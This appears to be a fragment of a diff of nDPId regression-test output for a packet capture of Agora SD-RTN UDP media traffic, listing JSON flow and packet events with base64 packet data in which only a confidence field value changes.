-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069656,"flow_last_seen":1649098069656,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069656,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069656,"flow_last_seen":1649098069656,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069656,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1649098069656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069656,"pkt":"eJS0JASgYDjgxTWgCABFoAEGneVAAD8RBqrAqAJkF\/i6s53JH8IA8s3FANAqagAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXiddqZ56BOXneEQ4mP388RlUbMx7s0KlWJgk5kvEFFQUQEAEFFU0dQVUJTQQAE2i0ZP5UqhloJODTaOh+IlYI+UqEvQtfYePDLs+DPY\/wb\/ex7kxsKDZa0UBpqtKFPW3cONzQvrgAKQsaxWmXF50tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1649098069656,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069656,"pkt":"eJS0JASgYDjgxTWgCABFoAEGneZAAD8RBqnAqAJkF\/i6s53JH8IA8s3FANAqagAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXiddqZ56BOXneEQ4mP388RlUbMx7s0KlWJgk5kvEFFQUQEAEFFU0dQVUJTQQAE2i0ZP5UqhloJODTaOh+IlYI+UqEvQtfYePDLs+DPY\/wb\/ex7kxsKDZa0UBpqtKFPW3cONzQvrgAKQsaxWmXF50tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1649098069706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069706,"pkt":"eJS0JASgYDjgxTWgCABFoAEGnXhAAD8RBxfAqAJkF\/i6s7ldH8IA8lBqANlPMQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXhQpGxSUTlZVVzRgedZI3rLw+yxzMMdRjhd4IxCkFFQUQEAEFFU0dQVUJTQQAEzTSboCt7FM6A6woBSDA6BXje0FytH\/VlmqM5WAGn1G0SDjb8WsY2P509Oy+4jMINQREZeQEsu3l+MyWzK1mwlUtFWFMEAFAyNTZDQ1JUKADZFgkMuGiQFv+XwY\/lEZgfEpSWft+heUioR7HtGh8+YnBtBMYIuCeZ"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098069706,"flow_last_seen":1649098069706,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098069706,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":47453,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1649098069706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069706,"pkt":"eJS0JASgYDjgxTWgCABFoAEGnXlAAD8RBxbAqAJkF\/i6s7ldH8IA8lBqANlPMQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXhQpGxSUTlZVVzRgedZI3rLw+yxzMMdRjhd4IxCkFFQUQEAEFFU0dQVUJTQQAEzTSboCt7FM6A6woBSDA6BXje0FytH\/VlmqM5WAGn1G0SDjb8WsY2P509Oy+4jMINQREZeQEsu3l+MyWzK1mwlUtFWFMEAFAyNTZDQ1JUKADZFgkMuGiQFv+XwY\/lEZgfEpSWft+heUioR7HtGh8+YnBtBMYIuCeZ"} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1649098069706,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098069706,"pkt":"eJS0JASgYDjgxTWgCABFoAEGnXpAAD8RBxXAqAJkF\/i6s7ldH8IA8lBqANlPMQAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXhQpGxSUTlZVVzRgedZI3rLw+yxzMMdRjhd4IxCkFFQUQEAEFFU0dQVUJTQQAEzTSboCt7FM6A6woBSDA6BXje0FytH\/VlmqM5WAGn1G0SDjb8WsY2P509Oy+4jMINQREZeQEsu3l+MyWzK1mwlUtFWFMEAFAyNTZDQ1JUKADZFgkMuGiQFv+XwY\/lEZgfEpSWft+heUioR7HtGh8+YnBtBMYIuCeZ"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098070259,"flow_last_seen":1649098070259,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098070259,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1649098070259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098070259,"pkt":"eJS0JASgYDjgxTWgCABFoAEGcMpAAD8R\/H7AqAJkaKahS53JH8IA8s+NAEgoZgAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXixWqIu8Gcf4dKl8YbY6ScLHaeEVhZsgcXNXy8JkFFQUQEAEFFU0dQVUJTQQAEW9tpqQFA11\/RBrZKZfvLqZo+b7pqhtn0DCWx+rfbK0RhV3SjA4EIMBkWWjSgD3I+lMSTJETgvPJiu1gt5j6GSEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098070259,"flow_last_seen":1649098070259,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098070259,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098070259,"flow_last_seen":1649098070259,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098070259,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":40393,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1649098070260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098070260,"pkt":"eJS0JASgYDjgxTWgCABFoAEGcMtAAD8R\/H3AqAJkaKahS53JH8IA8s+NAEgoZgAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXixWqIu8Gcf4dKl8YbY6ScLHaeEVhZsgcXNXy8JkFFQUQEAEFFU0dQVUJTQQAEW9tpqQFA11\/RBrZKZfvLqZo+b7pqhtn0DCWx+rfbK0RhV3SjA4EIMBkWWjSgD3I+lMSTJETgvPJiu1gt5j6GSEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00757{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1649098070260,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098070260,"pkt":"eJS0JASgYDjgxTWgCABFoAEGcMxAAD8R\/HzAqAJkaKahS53JH8IA8s+NAEgoZgAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKXixWqIu8Gcf4dKl8YbY6ScLHaeEVhZsgcXNXy8JkFFQUQEAEFFU0dQVUJTQQAEW9tpqQFA11\/RBrZKZfvLqZo+b7pqhtn0DCWx+rfbK0RhV3SjA4EIMBkWWjSgD3I+lMSTJETgvPJiu1gt5j6GSEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093575787,"flow_last_seen":1649093575878,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":2971,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093570648,"flow_last_seen":1649093570772,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":4016,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093710805,"flow_last_seen":1649093710879,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3070,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640794,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3143,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093580792,"flow_last_seen":1649093580849,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3272,"flow_avg_l4_payload_len":218,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":6422,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093575787,"flow_last_seen":1649093575878,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":2971,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093570648,"flow_last_seen":1649093570772,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":4016,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093710805,"flow_last_seen":1649093710879,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3070,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640794,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3143,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093580792,"flow_last_seen":1649093580849,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3272,"flow_avg_l4_payload_len":218,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649093640842,"flow_last_seen":1649093640842,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":6422,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1649098070310,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":46798,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098089567,"flow_last_seen":1649098089567,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098089567,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1649098089567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098089567,"pkt":"eJS0JASgYDjgxTWgCABFoAEGfpRAAD8R7rTAqAJkaKahS9gaH8IA8rfKAGAtlAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKX2UCEar3dNMPGtldPVRNmQ34X8ajeoM6TdWbZjDkFFQUQEAEFFU0dQVUJTQQAE6Cg10bM\/s1\/AQlysPUPvJxLM50KHpzktiZkWalUHk9iQoPekmRbdl\/zw\/WgmvM4RvbCndAgYzXUOxjChVG3pIktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098089567,"flow_last_seen":1649098089567,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098089567,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098089567,"flow_last_seen":1649098089567,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649098089567,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1649098089567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098089567,"pkt":"eJS0JASgYDjgxTWgCABFoAEGfpVAAD8R7rPAqAJkaKahS9gaH8IA8rfKAGAtlAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKX2UCEar3dNMPGtldPVRNmQ34X8ajeoM6TdWbZjDkFFQUQEAEFFU0dQVUJTQQAE6Cg10bM\/s1\/AQlysPUPvJxLM50KHpzktiZkWalUHk9iQoPekmRbdl\/zw\/WgmvM4RvbCndAgYzXUOxjChVG3pIktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1649098089567,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649098089567,"pkt":"eJS0JASgYDjgxTWgCABFoAEGfpZAAD8R7rLAqAJkaKahS9gaH8IA8rfKAGAtlAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKX2UCEar3dNMPGtldPVRNmQ34X8ajeoM6TdWbZjDkFFQUQEAEFFU0dQVUJTQQAE6Cg10bM\/s1\/AQlysPUPvJxLM50KHpzktiZkWalUHk9iQoPekmRbdl\/zw\/WgmvM4RvbCndAgYzXUOxjChVG3pIktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649098094676,"flow_last_seen":1649098094676,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649098094676,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.233.218","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 